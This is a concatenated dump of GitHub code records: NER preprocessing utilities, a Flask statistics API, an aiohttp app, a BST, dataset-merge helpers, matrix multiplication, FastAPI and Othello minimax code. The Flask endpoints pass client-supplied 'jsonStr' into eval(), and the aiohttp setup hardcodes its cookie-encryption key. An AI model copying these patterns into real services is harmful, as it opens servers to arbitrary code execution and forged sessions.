]|([\\-\\_\\,\\.])')\n\n    def contains_arabic(self, text):\n        pattern = r'[\\u0600-\\u06FF]+' # regex that matches Arabic characters\n        matches = re.search(pattern, text)\n        if matches:\n            return True\n        return False\n    \n    def viterbi_tokenize(self, sentence):\n        token_list = []\n        tokens = re.split(self.pattern, sentence)\n        for token in tokens:\n            if token and token not in '\\-\\_' and not self.contains_arabic(token):\n                token_list.extend(self.segmenter.split(token))\n            elif token and (token in '\\-\\_' or self.contains_arabic(token)):\n                token_list.append(token)\n        return token_list\n    \n    def tokenize(self, sentence):\n        token_list = []\n        tokens = re.split(self.pattern, sentence)\n        for token in tokens:\n            if token:\n                token_list.append(token)\n        return token_list\n\n\ndef build_data(data_path, output_path, 
with_label=True):\n    '''\n    Clean and tokenize the dataset\n    '''\n    if with_label:\n        label_list = []\n        text_list = []\n        with open(data_path,'r',encoding='utf-8') as f:\n            texts = []\n            labels = []\n            text_list = []\n            label_list = []\n            for line in tqdm(f):\n                if line != '\\n':\n                    line_list = line.strip('\\n').split('\\t')\n                    text_list.append(line_list[0])\n                    label_list.append(line_list[1])\n                else:\n                    texts.append(text_list)\n                    labels.append(label_list)\n                    text_list = []\n                    label_list = []\n        with open(output_path,'w') as f:\n            for text, label in tqdm(zip(texts, labels)):\n                json.dump({\"text\":text,\"label\":label},f)\n                f.write('\\n')\n    else:\n        text_list = []\n        with open(data_path,'r',encoding='utf-8') as f:\n            texts = []\n            text_list = []\n            for line in tqdm(f):\n                if line != '\\n':\n                    text_list.append(line.strip('\\n'))\n                else:\n                    texts.append(text_list)\n                    text_list = []\n        with open(output_path,'w') as f:\n            for text in tqdm(texts):\n                json.dump({\"text\":text},f)\n                f.write('\\n')\n\n\ndef build_train_val_test(train_data_path, \n                         val_data_path, \n                         test_data_path, \n                         train_build_path, \n                         val_build_path, \n                         test_build_path):\n    '''\n    Clean the training, validation and test sets \n    '''\n    print('Cleaning data...')\n    build_data(train_data_path, train_build_path)\n    build_data(val_data_path, val_build_path)\n    build_data(test_data_path, test_build_path)\n    \ndef read_json(file_path):\n    with open(file_path, 'r', encoding='utf-8') as f:\n        file = json.load(f)\n    return file\n\ndef write_json(json_file, file_path):\n    with open(file_path, 'w', encoding='utf-8') as f:\n        json.dump(json_file, f)\n\n\ndef build_word2id_char2id_tag2id(data_path, \n                                 case=True, \n                                 pretrain_vector_path=None, \n                                 max_word2id_size=None, \n                                 max_char2id_size=None, \n                                 min_word_freq=1, \n                                 min_char_freq=1):\n    '''\n    case: if True, keep the original case; if False, lowercase words and characters\n    pretrain_vector_path: path to the pretrained word vectors, used to build word2id from the word2vec vocabulary\n    max_word2id_size: maximum vocabulary size\n    max_char2id_size: maximum character-table size\n    min_word_freq: minimum word frequency\n    min_char_freq: minimum character frequency\n    '''\n    # build word2id\n    word_freq = defaultdict(int)\n    char_freq = defaultdict(int)\n    word2id = {}\n    tag2id = {}\n    char2id = {}\n    if not pretrain_vector_path:\n        with open(data_path, 'r', encoding='utf-8') as f:\n            for line in tqdm(f):\n                sentence = json.loads(line)\n                text = sentence['text']\n                tags = sentence['label']\n                for word, tag in zip(text, tags):\n                    if tag not in tag2id:\n                        tag2id[tag] = len(tag2id)\n                    if case:\n                        word_freq[word] += 1\n                    else:\n                        word_freq[word.lower()] += 1\n                    for char in word:\n                        if case:\n                            char_freq[char] += 1\n                        else:\n                            char_freq[char.lower()] += 1\n        vocab_list = [(word, freq) for word, freq in word_freq.items() if freq >= min_word_freq]\n        vocab_list.sort(key=lambda x: x[1], reverse=True)\n        char_list = [(char, freq) for char, freq in char_freq.items() if freq >= min_char_freq]\n        if max_word2id_size:\n            vocab_list = vocab_list[:max_word2id_size]\n        if max_char2id_size:\n            char_list = char_list[:max_char2id_size]\n        word2id = {'<PAD>': 0, '<UNK>': 1}\n        char2id = {'<PAD>': 0, '<UNK>': 1}\n        word2id.update({word_count[0]: idx+2 for idx, word_count in enumerate(vocab_list)})\n        char2id.update({char_count[0]: idx+2 for idx, char_count in enumerate(char_list)})\n    else:\n        model = KeyedVectors.load_word2vec_format(pretrain_vector_path, binary=False)\n        word2id = {'<PAD>': 0, '<UNK>': 1}\n        if tuple(map(int, gensim.__version__.split('.'))) > (4,0,0):\n            vocab = model.key_to_index\n        else:\n            vocab = model.wv.vocab\n        for idx,i in enumerate(list(vocab)):\n            word2id[i] = idx + 2\n        with open(data_path,'r') as f:\n            for line in f:\n                sentence = json.loads(line)\n                tags = sentence['label']\n                text = sentence['text']\n                for word, tag in zip(text, tags):\n                    if tag not in tag2id:\n                        
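# assign the next integer id to each newly seen tag\n                        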
tag2id[tag] = len(tag2id)\n                    for char in word:\n                        if case:\n                            char_freq[char] += 1\n                        else:\n                            char_freq[char.lower()] += 1\n        char_list = [(char, freq) for char, freq in char_freq.items() if freq >= min_char_freq]\n        if max_char2id_size:\n            char_list = char_list[:max_char2id_size]\n        char2id = {'<PAD>': 0, '<UNK>': 1} \n        char2id.update({char_count[0]: idx+2 for idx, char_count in enumerate(char_list)})\n\n    id2word = {v:k for k,v in word2id.items()}\n    id2tag = {v:k for k,v in tag2id.items()}\n    id2char = {v:k for k,v in char2id.items()}\n\n    write_json(word2id, './conf/word2id.json')\n    write_json(char2id, './conf/char2id.json')\n    write_json(tag2id, './conf/tag2id.json')\n    write_json(id2word, './conf/id2word.json')\n    write_json(id2tag, './conf/id2tag.json')\n    write_json(id2char, './conf/id2char.json')\n    \n    return word2id, char2id, tag2id\n\ndef filter_word2vec(word2id, output_path, word2vec_path):\n    '''\n    Filter the pretrained word vectors down to the vocabulary \n    '''\n    print('Loading word vectors...')\n    model = KeyedVectors.load_word2vec_format(word2vec_path, binary=False)\n    # create a new dict holding the filtered words and their corresponding vectors\n    filtered_word2vec = {}\n    # iterate over the vocabulary and keep every word that exists in the pretrained model\n    print('Filtering word vectors...')\n    if tuple(map(int, gensim.__version__.split('.'))) > (4,0,0):\n        vocab = model.key_to_index\n    else:\n        vocab = model.wv.vocab\n    for word in tqdm(vocab):\n        if word in word2id:\n            filtered_word2vec[word] = model[word]\n    \n    # write the filtered vectors to a new text file\n    with open(output_path, 'w', encoding='utf-8') as f:\n        for word, vector in filtered_word2vec.items():\n            vector_str = ' '.join(str(val) for val in vector)\n            line = f\"{word} {vector_str}\\n\"\n            f.write(line)\n    \n    # vector dimension\n    with open(output_path, 'r',encoding='utf-8') as f:\n        line = f.readline().split(' ')\n\n    vector_size = len(line) - 1\n\n    # vocabulary size after filtering\n    with open(output_path, 'r',encoding='utf-8') as f:\n        lines = f.readlines()\n    vocab_size = len(lines)\n\n    # prepend vocab size and dimension to the file header (word2vec text format)\n    with open(output_path, 'r+',encoding='utf-8') as f:\n        content = f.read()\n        f.seek(0, 0)\n        f.write(('%d %d\\n' % (vocab_size, vector_size)) + content)\n\n    print(f\"Filtered word vectors saved to '{output_path}'.\")\n\n\nclass MyDataset(Dataset):\n    def __init__(self, data_path, word2id, tag2id, char2id, max_sentence_length=64, max_word_length=20, with_label=True):\n        self.with_label = with_label\n        self.word2id = word2id\n        self.char2id = char2id\n        self.texts = []\n        self.data_path = data_path\n        self.max_word_length = max_word_length\n        if self.with_label:\n            self.tag2id = tag2id\n            self.labels = []\n            with open(data_path,'r') as f:\n                for line in f:\n                    sentence = json.loads(line)\n                    self.texts.append(sentence['text'])\n                    self.labels.append(sentence['label'])\n        else:\n            with open(data_path,'r') as f:\n                for line in f:\n                    sentence = json.loads(line)\n                    self.texts.append(sentence['text'])\n        # mask\n        self.mask = []\n        for sentence in self.texts:\n            mask = [1] * len(sentence)\n            self.mask.append(mask)\n\n        if self.with_label:\n            for i in range(len(self.texts)):\n                length = len(self.texts[i])\n                if length < max_sentence_length:\n                    pad_length = max_sentence_length - length\n                    self.texts[i].extend(['<PAD>'] * pad_length)\n                    self.labels[i].extend(['O'] * pad_length)\n                    self.mask[i].extend([0] * pad_length)\n                else:\n                    self.texts[i] = self.texts[i][:max_sentence_length]\n                    self.labels[i] = self.labels[i][:max_sentence_length]\n                    self.mask[i] = self.mask[i][:max_sentence_length]\n        else:\n            for i in range(len(self.texts)):\n                length = len(self.texts[i])\n                if length < max_sentence_length:\n                    pad_length = max_sentence_length - length\n                    self.texts[i].extend(['<PAD>'] * pad_length)\n                    self.mask[i].extend([0] * pad_length)\n                else:\n                    
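# truncate sequences longer than max_sentence_length\n                    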
self.texts[i] = self.texts[i][:max_sentence_length]\n                    self.mask[i] = self.mask[i][:max_sentence_length]\n\n    def __len__(self):\n        return len(self.texts)\n\n    def __getitem__(self, idx):\n        if self.with_label:\n            label = self.labels[idx]\n            label_to_id = []\n        sentence = self.texts[idx]\n        mask = self.mask[idx]\n        sentence_to_id = []\n        char_to_id = []\n        if self.with_label:\n            for word, tag, m in zip(sentence, label, mask):\n                if word in self.word2id:\n                    sentence_to_id.append(self.word2id[word])\n                else:\n                    sentence_to_id.append(self.word2id['<UNK>'])\n                word_length = len(word)\n                word_to_char_to_idx = []\n                if len(word) <= self.max_word_length:\n                    chars_list = [char for char in word] + ['<PAD>'] * (self.max_word_length - word_length)\n                    for char in chars_list:\n                        char_id = self.char2id.get(char, self.char2id['<UNK>'])\n                        word_to_char_to_idx.append(char_id)\n                else:\n                    chars_list = [char for char in word[:self.max_word_length]]\n                    for char in chars_list:\n                        char_id = self.char2id.get(char, self.char2id['<UNK>'])\n                        word_to_char_to_idx.append(char_id)\n                char_to_id.append(word_to_char_to_idx)\n                label_to_id.append(self.tag2id[tag])\n            return torch.LongTensor(sentence_to_id), torch.LongTensor(char_to_id), torch.LongTensor(label_to_id), torch.tensor(mask).bool()\n        else:\n            for word, m in zip(sentence, mask):\n                if word in self.word2id:\n                    sentence_to_id.append(self.word2id[word])\n                else:\n                    sentence_to_id.append(self.word2id['<UNK>'])\n                word_length = len(word)\n                word_to_char_to_idx = []\n                if len(word) <= self.max_word_length:\n                    chars_list = [char for char in word] + ['<PAD>'] * (self.max_word_length - word_length)\n                    for char in chars_list:\n                        char_id = self.char2id.get(char, self.char2id['<UNK>'])\n                        word_to_char_to_idx.append(char_id)\n                else:\n                    chars_list = [char for char in word[:self.max_word_length]]\n                    for char in chars_list:\n                        char_id = self.char2id.get(char, self.char2id['<UNK>'])\n                        word_to_char_to_idx.append(char_id)\n                char_to_id.append(word_to_char_to_idx)\n            return torch.LongTensor(sentence_to_id), torch.LongTensor(char_to_id), torch.tensor(mask).bool()\n\n\n\ndef init_network(model, method='xavier', exclude='embedding', seed=42):\n    '''\n    Weight initialization\n    method: xavier or kaiming (default: xavier)\n    '''\n    for name, w in model.named_parameters():\n        if exclude not in name:\n            if 'weight' in name:\n                if method == 'xavier':\n                    nn.init.xavier_normal_(w)\n                elif method == 'kaiming':\n                    nn.init.kaiming_normal_(w)\n                else:\n                    nn.init.normal_(w)\n            elif 'bias' in name:\n                nn.init.constant_(w, 0)\n            else:\n                pass\n\n","repo_name":"ponymhc/BiLSTM_CNN_CRF","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"31940568615","text":"import json\nimport pandas as pd\nimport sys\nfrom flask import Blueprint\nfrom flask import current_app as app\nfrom flask import request\nfrom flask import jsonify\nfrom scipy import stats\nfrom utillities.exceptions import ExceptionHelpers\nfrom sklearn.naive_bayes import GaussianNB\n\n\nmod = Blueprint('stats', __name__)\nnull = None\n@mod.route('z_score/', methods=[\"POST\"])\ndef z_score():\n    try:\n        request_dict = request.get_json()\n        jsonstr = request_dict['jsonStr']\n        columns = request_dict['columns']\n        df = pd.read_json(json.dumps(eval(jsonstr)), orient='split')\n        if(columns is None):\n            z_values = pd.np.abs(stats.zscore(df))\n            z_values = pd.np.transpose(z_values)\n            result = dict(zip(df.columns.values.tolist(), z_values.tolist())) \n        else:\n            z_values = pd.np.abs(stats.zscore(df[columns]))\n            z_values = 
pd.np.transpose(z_values)\n result = dict(zip(columns, z_values.tolist()))\n print(result)\n response = app.response_class(\n response=json.dumps(result),\n status=200,\n mimetype='application/json'\n )\n except:\n exception = ExceptionHelpers.format_exception(sys.exc_info())\n response = app.response_class(\n response=exception,\n status=400,\n mimetype='application/json'\n )\n return response\n\n@mod.route('drop_outliers/', methods=[\"POST\"])\ndef drop_outliers():\n try:\n request_dict = request.get_json()\n jsonstr = request_dict['jsonStr']\n z_values = request_dict['z_values']\n standard_deviation = request_dict['standard_deviation']\n keys = list(z_values.keys())\n vals = [z_values[x] for x in keys]\n transpose_vals = pd.np.transpose(vals).tolist()\n \n bools = []\n for i in transpose_vals:\n b = all(item < standard_deviation for item in i)\n bools.append(b)\n df = pd.read_json(json.dumps(eval(jsonstr)), orient='split')\n filtered_df = df[bools]\n df_json = filtered_df.to_json(orient='split', date_format='iso')\n response = app.response_class(\n response=df_json,\n status=200,\n mimetype='application/json'\n )\n except:\n exception = ExceptionHelpers.format_exception(sys.exc_info())\n response = app.response_class(\n response=exception,\n status=400,\n mimetype='application/json'\n )\n return response\n\n@mod.route('naive_bayes/', methods=[\"POST\"])\ndef naive_bayes():\n try:\n request_dict = request.get_json()\n traning_features = request_dict['traning_features']\n traning_targets = request_dict['traning_targets']\n test_features = request_dict['test_features']\n\n from sklearn.preprocessing import StandardScaler\n sc = StandardScaler()\n X_train = sc.fit_transform(pd.np.array(traning_features))\n X_test = sc.transform(pd.np.array(test_features))\n\n # Fitting Naive Bayes to the Training set\n from sklearn.naive_bayes import GaussianNB\n classifier = GaussianNB()\n classifier.fit(X_train, traning_targets)\n\n # Predicting the Test set results\n y_pred = classifier.predict(X_test)\n json_response = json.dumps(y_pred.tolist())\n response = app.response_class(\n response=json_response,\n status=200,\n mimetype='application/json'\n )\n except:\n exception = ExceptionHelpers.format_exception(sys.exc_info())\n print(exception)\n response = app.response_class(\n response=exception,\n status=400,\n mimetype='application/json'\n )\n print(exception)\n return response ","repo_name":"SHKnudsen/Pandamo","sub_path":"src/Python/pandasDynamo/pandamo/api/statistics/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"30208555555","text":"from aiohttp_apispec.aiohttp_apispec import setup_aiohttp_apispec\nimport logging\nfrom typing import Callable, AsyncGenerator\nfrom aiohttp import web\nfrom aiohttp.web_middlewares import normalize_path_middleware\nfrom aiohttp_session import session_middleware\nfrom aiohttp_session.cookie_storage import EncryptedCookieStorage\n\nfrom config import Config, DatabaseConfig\nfrom api.handlers import routes\nfrom dl.repository import Repository\n\n\ndef cleanup_database(\n config: DatabaseConfig\n) -> Callable[[web.Application], AsyncGenerator]:\n async def cleanup(app: web.Application) -> AsyncGenerator:\n async with Repository(config) as repository:\n app['repository'] = repository\n yield\n return cleanup\n\n\ndef get_app(config: Config) -> web.Application:\n app = web.Application(\n middlewares=[\n normalize_path_middleware(),\n 
session_middleware(EncryptedCookieStorage(\n b'Thirty two length bytes key.')\n )\n ],\n )\n logging.basicConfig(level=logging.DEBUG)\n setup_aiohttp_apispec(\n app=app,\n title=\"coordinate_project\",\n url=\"/api/docs/swagger.json\",\n swagger_path=\"/api/docs\",\n )\n app.cleanup_ctx.append(cleanup_database(config.db))\n app['secret_table'] = config.app.secret_table\n app.add_routes(routes)\n return app\n","repo_name":"carolinepi/coarsening-of-coordinates","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14071277837","text":"class BST:\n def __init__(self, data=None):\n self.left = None\n self.right = None\n self.data = data\n\n def insert(self, data):\n if not self.data:\n self.data = data\n return\n\n if self.data == data:\n return\n\n if data < self.data:\n if self.left:\n self.left.insert(data)\n return\n self.left = BST(data)\n return\n\n if self.right:\n self.right.insert(data)\n return\n self.right = BST(data)\n\n def get_min(self):\n current = self\n while current.left is not None:\n current = current.left\n return current.data\n\n def get_max(self):\n current = self\n while current.right is not None:\n current = current.right\n return current.data\n\n def preorder(self, datas):\n if self.data is not None:\n datas.append(self.data)\n if self.left is not None:\n self.left.preorder(datas)\n if self.right is not None:\n self.right.preorder(datas)\n return datas\n\n def inorder(self, datas):\n if self.left is not None:\n self.left.inorder(datas)\n if self.data is not None:\n datas.append(self.data)\n if self.right is not None:\n self.right.inorder(datas)\n return datas\n\n def postorder(self, datas):\n if self.left is not None:\n self.left.postorder(datas)\n if self.right is not None:\n self.right.postorder(datas)\n if self.data is not None:\n datas.append(self.data)\n return datas\n","repo_name":"goatcheese82/python_structures","sub_path":"examples/tree_solution.py","file_name":"tree_solution.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19036544556","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 18 09:32:29 2019\n\n@author: Gary\n\"\"\"\nimport pandas as pd\n\ndef add_Elsner_table(df,sources='./sources/',\n outdir='./out/',\n ehfn='elsner_corrected_table.csv'):\n #print('Adding Elsner/Hoelzer table to CAS table')\n ehdf = pd.read_csv(sources+ehfn,quotechar='$')\n # checking overlap first:\n ehcas = list(ehdf.eh_CAS.unique())\n dfcas = list(df.bgCAS.unique())\n with open(outdir+'elsner_non_overlap.txt','w') as f:\n f.write('**** bgCAS numbers without an Elsner entry: *****\\n')\n for c in dfcas:\n if c not in ehcas:\n f.write(f'{c}\\n')\n f.write('\\n\\n***** Elsner CAS numbers without a FF entry: *****\\n')\n for c in ehcas:\n if c not in dfcas:\n f.write(f'{c}\\n')\n\n mg = pd.merge(df,ehdf,left_on='bgCAS',right_on='eh_CAS',\n how='left',validate='1:1')\n return mg\n\ndef add_WellExplorer_table(df,sources='./sources/',\n outdir='./out/',\n wefn='well_explorer_corrected.csv'):\n \"\"\"Add the WellExplorer data table. 
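Rows are merged 1:1 on CAS number; CAS IDs present in only one source are logged to a non-overlap report. 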
\"\"\"\n #print('Adding WellExplorer table to CAS table')\n wedf = pd.read_csv(sources+wefn)\n #print(wedf.head())\n # checking overlap first:\n wecas = list(wedf.we_CASNumber.unique())\n dfcas = list(df.bgCAS.unique())\n with open(outdir+'wellexplorer_non_overlap.txt','w') as f:\n f.write('**** bgCAS numbers without an WellExplorer entry: *****\\n')\n for c in dfcas:\n if c not in wecas:\n f.write(f'{c}\\n')\n f.write('\\n\\n***** WellExplorer CAS numbers without a FF entry: *****\\n')\n for c in wecas:\n if c not in dfcas:\n f.write(f'{c}\\n')\n\n mg = pd.merge(df,wedf,left_on='bgCAS',right_on='we_CASNumber',\n how='left',validate='1:1')\n return mg\n\n \ndef add_TEDX_ref(df,sources='./sources/',\n tedx_fn = 'TEDX_EDC_trimmed.xls'):\n #print('Adding TEDX link to CAS table')\n tedxdf = pd.read_excel(sources+tedx_fn)\n tedx_cas = tedxdf.CAS_Num.unique().tolist()\n df['is_on_TEDX'] = df.bgCAS.isin(tedx_cas)\n return df\n \ndef add_TSCA_ref(df,sources='./sources/',\n tsca_fn = 'TSCAINV_092019.csv'):\n #print('Adding TSCA to CAS table')\n tscadf = pd.read_csv(sources+tsca_fn)\n tsca_cas = tscadf.CASRN.unique().tolist()\n df['is_on_TSCA'] = df.bgCAS.isin(tsca_cas)\n return df\n \ndef add_Prop65_ref(df,sources='./sources/',\n p65_fn = 'p65list12182020.csv'):\n #print('Adding California Prop 65 to CAS table')\n p65df = pd.read_csv(sources+p65_fn,encoding='iso-8859-1')\n p65_cas = p65df['CAS No.'].unique().tolist()\n df['is_on_prop65'] = df.bgCAS.isin(p65_cas)\n return df\n \ndef add_CWA_SDWA_ref(df,sources='./sources/',\n cwa_fn = 'sara_sdwa_cwa.csv'):\n #print('Adding SDWA/CWA lists to CAS table')\n cwadf = pd.read_csv(sources+cwa_fn)\n cwa_cas = cwadf['CASNo'].unique().tolist()\n df['is_on_CWA_SDWA'] = df.bgCAS.isin(cwa_cas)\n return df\n \ndef add_all_bgCAS_tables(df,sources='./sources/external_refs/',\n outdir='./outdir/'):\n df = add_CWA_SDWA_ref(df,sources)\n df = add_Prop65_ref(df,sources)\n df = add_TSCA_ref(df,sources)\n df = add_TEDX_ref(df,sources)\n df = add_WellExplorer_table(df,sources,outdir)\n df = add_Elsner_table(df,sources,outdir)\n return df\n ","repo_name":"gwallison/openFF2","sub_path":"core/external_dataset_tools.py","file_name":"external_dataset_tools.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42179198132","text":"#!/usr/bin/python3\n\n\n\"\"\"\nA module that provides a function that multiplies two matrix.\n\"\"\"\n\n\ndef matrix_mul(m_a, m_b):\n \"\"\"\n The function multiplies 2 matrix (list of lists)\n and raises exception if there is any form of\n impossibilities in multiplying\n \"\"\"\n if type(m_a) != list:\n raise TypeError(\"m_a must be a list\")\n if type(m_b) != list:\n raise TypeError(\"m_b must be a list\")\n\n result = []\n len_a = len(m_a[0]) if len(m_a) and type(m_a[0]) == list else 0\n len_b = len(m_b[0]) if len(m_b) and type(m_b[0]) == list else 0\n\n for ma in m_a:\n if type(ma) != list:\n raise TypeError(\"m_a must be a list of lists\")\n if len(ma) != len_a:\n raise TypeError(\"each row of m_a must be of the same size\")\n for a in ma:\n if type(a) not in (int, float):\n raise TypeError(\"m_a should contain only integers or floats\")\n for mb in m_b:\n if type(mb) != list:\n raise TypeError(\"m_b must be a list of lists\")\n if len(mb) != len_b:\n raise TypeError(\"each row of m_b must be of the same size\")\n for b in mb:\n if type(b) not in (int, float):\n raise TypeError(\"m_b should contain only integers or floats\")\n\n if len(m_a) == 
0 or (len(m_a) == 1 and len(m_a[0]) == 0):\n        raise ValueError(\"m_a can't be empty\")\n    if len(m_b) == 0 or (len(m_b) == 1 and len(m_b[0]) == 0):\n        raise ValueError(\"m_b can't be empty\")\n\n    for idx in range(len(m_a)):\n        new_arr = []\n        row = m_a[idx]\n        for i in range(len_b):\n            points = 0\n            for j in range(len(row)):\n                try:\n                    points += row[j] * m_b[j][i]\n                except IndexError:\n                    raise ValueError(\"m_a and m_b \\\ncan't be multiplied\") from None\n            new_arr.append(points)\n        result.append(new_arr)\n    if len_a != len(m_b):\n        raise ValueError(\"m_a and m_b can't be multiplied\")\n    return result\n","repo_name":"shady-cj/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/100-matrix_mul.py","file_name":"100-matrix_mul.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"24017087531","text":"from typing import Optional\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\n\n\nclass Item(BaseModel):\n    name: str\n    description: Optional[str] = None\n    price: float\n    tax: Optional[float] = None\n\n\napp = FastAPI()\n\n\n@app.post(\"/items/{item_id}\")\nasync def create_item(item_id: int, item: Item, query: int):\n    item.name = item.name.capitalize()\n    item_dict = {\"item_id\": item_id, **item.dict()}\n    item_dict.update({\"query\": query})\n    if item.tax:\n        price_with_tax = item.price + item.tax\n        item_dict.update({\"price_with_tax\": price_with_tax})\n    print(\"item: \", item_dict)\n    return item_dict\n\n\n@app.get(\"/req_body_items/{user_id}/{item_id}\")\nasync def req_body_get_item(user_id: int, item_id: int):\n    return {\"user_id\": user_id, \"item_id\": item_id}\n","repo_name":"lukasz-segin/fast_api_first_tutorial","sub_path":"request_body.py","file_name":"request_body.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"24160082557","text":"from abc import ABC, abstractmethod\nfrom typing import List\n\nfrom .MessageSourceResolvable import MessageSourceResolvable\nfrom springframework.utils.mock.inst import Locale\n\n\nclass MessageSource(ABC):\n    @abstractmethod\n    def get_message(\n        self,\n        locale: Locale,\n        default_message: str = None,\n        resolvable: MessageSourceResolvable = None,\n        code: str = None,\n        args: List[object] = None,\n    ):\n        raise NotImplementedError\n","repo_name":"j40903272/spring-webmvc-python","sub_path":"springframework/context/MessageSource.py","file_name":"MessageSource.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"}
{"seq_id":"38083780724","text":"import time\nimport numpy as np\n\n# The size of board\nSIZE = 8\n# The start condition\nSTART_BOARD = np.zeros((SIZE, SIZE), dtype=int)\nSTART_BOARD[SIZE//2, SIZE//2], START_BOARD[SIZE//2-1, SIZE//2-1] = 1, 1\nSTART_BOARD[SIZE//2-1, SIZE//2], START_BOARD[SIZE//2, SIZE//2-1] = -1, -1\n# The maximum search depth of the Min-Max method\nDEPTH = 3\n\n\nclass Game:\n    # First player: -1, Second player: 1\n    def __init__(self, b, first_eb, second_eb):\n        self.board = b\n        self.eboards = (first_eb, np.nan, second_eb)\n    \n    \n    # Copy this class itself\n    def copy(self):\n        return Game(self.board.copy(), self.eboards[0], self.eboards[2])\n    \n    \n    # Count the number of player's stones.\n    def count_stones(self, player):\n        return np.sum(self.board == player)\n    \n    \n    # Find the positions where the player can put a stone.\n    # arg: player\n    
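# note: a square counts as available when placing a stone there flips at least one opponent stone\n    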
# return: list of available positions\n    def find_available(self, player):\n        availables = []\n        for x in range(SIZE):\n            for y in range(SIZE):\n                if self.board[x,y] == 0:\n                    if np.sum(self.board != self.forward(player, (x,y))) > 1:\n                        availables.append((x,y))\n        return availables\n    \n    \n    # Judge if the game has ended.\n    def judge_gameend(self):\n        if np.sum(self.board==0) == 0:\n            return True\n        elif (not self.find_available(1)) and (not self.find_available(-1)):\n            return True\n        else:\n            return False\n    \n    \n    # Judge the winner of this game\n    # if draw, return 0\n    def judge_winner(self):\n        # stone counts of the first and second players\n        num_1, num_2 = self.count_stones(-1), self.count_stones(1)\n        if num_1 > num_2: return -1\n        elif num_1 < num_2 : return 1\n        else: return 0\n    \n    \n    # Put a stone on a specific position.\n    # arg: player, position\n    # return: board\n    def forward(self, player, pos):\n        b = self.board.copy()\n        b[pos] = player\n        # Search in eight directions\n        for i in (-1,0,1):\n            for j in (-1,0,1):\n                if (i==0 and j==0): continue\n                # Search until the condition is satisfied\n                for k in range(1,SIZE):\n                    x, y = pos[0]+i*k, pos[1]+j*k\n                    # Judge if the position is inside the board\n                    if (x not in np.arange(0,SIZE)) or (y not in np.arange(0,SIZE)): break\n                    if (self.board[x,y]==0): break\n                    if (self.board[x,y]==player):\n                        for l in range(1,k): b[pos[0]+i*l, pos[1]+j*l] = player\n                        break\n        return b\n    \n    \n    # The board-evaluation function for the player\n    # arg: player\n    # return: evaluation score for the player\n    def eval_board(self, player):\n        eb = self.eboards[player+1]\n        return np.sum(eb * self.board) * player\n    \n    \n    # Min-Max method\n    # arg: game, evaluator(first player), player, max-search-depth, threshold to cutoff\n    # return: evaluation score, sequence of positions to take\n    def minmax(self, evaluator, player, depth, limit):\n        if depth == 0:\n            return self.eval_board(evaluator), []\n\n        switch = 1 if evaluator==player else -1\n        value = -switch * np.inf\n        choices = self.find_available(player)\n\n        # When there are no available moves\n        if not choices:\n            return self.eval_board(evaluator), []\n\n        move = []\n        for pos in choices:\n            g = self.copy()\n            g.board = g.forward(player, pos)\n            v, m = g.minmax(evaluator, -player, depth-1, value)\n            # min-max method (if switch=-1 -> value=min, switch=1 -> value=max)\n            if value * switch < v * switch:\n                value = v\n                move = m + [pos]\n            # alpha-beta pruning (left disabled: not fully debugged)\n            #if value * switch >= limit * switch: break\n        return value, move\n\n    \n    # find best move\n    # arg: game, player(1 or -1), depth\n    # return: score, best move\n    def find_best_move(self, player, depth):\n        result = self.minmax(player, player, depth, np.inf)\n        try:\n            score, best_move = result[0], result[1][-1]\n        except:\n            print(result)\n        return score, best_move\n    \n    \n    def player_action(self, player):\n        # when the player can still place a stone\n        if self.find_available(player):\n            evaluation = self.find_best_move(player, DEPTH)\n            self.board = self.forward(player, evaluation[1])\n            return \"Move: {}, Score: {}\".format(evaluation[1], evaluation[0])\n        else:\n            return \"----- No Choices -----\"\n    \n\n    def plot_board(self):\n        for x in range(SIZE):\n            for y in range(SIZE):\n                s = self.board[x,y]\n                if s==1: print('●', end='')\n                elif s==-1: print('○', end='')\n                else: print('-', end='')\n            print()\n\n    \n    \n# play game without display\n# arg: The first player's evaluation func., the second player's evaluation func.\n# return: the winner\ndef play(first_eb, second_eb, debug_mode):\n    start = time.time()\n    game = Game(START_BOARD.copy(), first_eb, second_eb)\n    # -1 moves first\n    player = -1\n    while not 
game.judge_gameend():\n        board = game.board.copy()\n        _ = game.player_action(player)\n        player *= -1\n    end = time.time()\n    if debug_mode:\n        game.plot_board()\n        print(\"time: {:3.1f} seconds\".format(end-start))\n    return game.judge_winner()\n    \n\n# Play game with display\n# arg: The first player's evaluation func., the second player's evaluation func.\n# return: \ndef play_usermode(first_eb, second_eb):\n    print(\"----------------------\")\n    print(\"----- Game Start -----\")\n    print(\"----------------------\")\n    print(\"first: Player(-1), second: Player(1)\")\n    print()\n    start = time.time()\n    game = Game(START_BOARD.copy(), first_eb, second_eb)\n    game.plot_board()\n    # -1 moves first\n    player = -1\n    while not game.judge_gameend():\n        board = game.board.copy()\n        print(game.player_action(player))\n        game.plot_board()\n        player *= -1\n    end = time.time()\n    print()\n    print(\"--------------------\")\n    print(\"----- Game End -----\")\n    print(\"--------------------\")\n    print(\"time: {:3.1f} seconds\".format(end-start))\n    winner = game.judge_winner()\n    if winner: print(\"The winner: Player({})\".format(winner))\n    else: print(\"This game is a 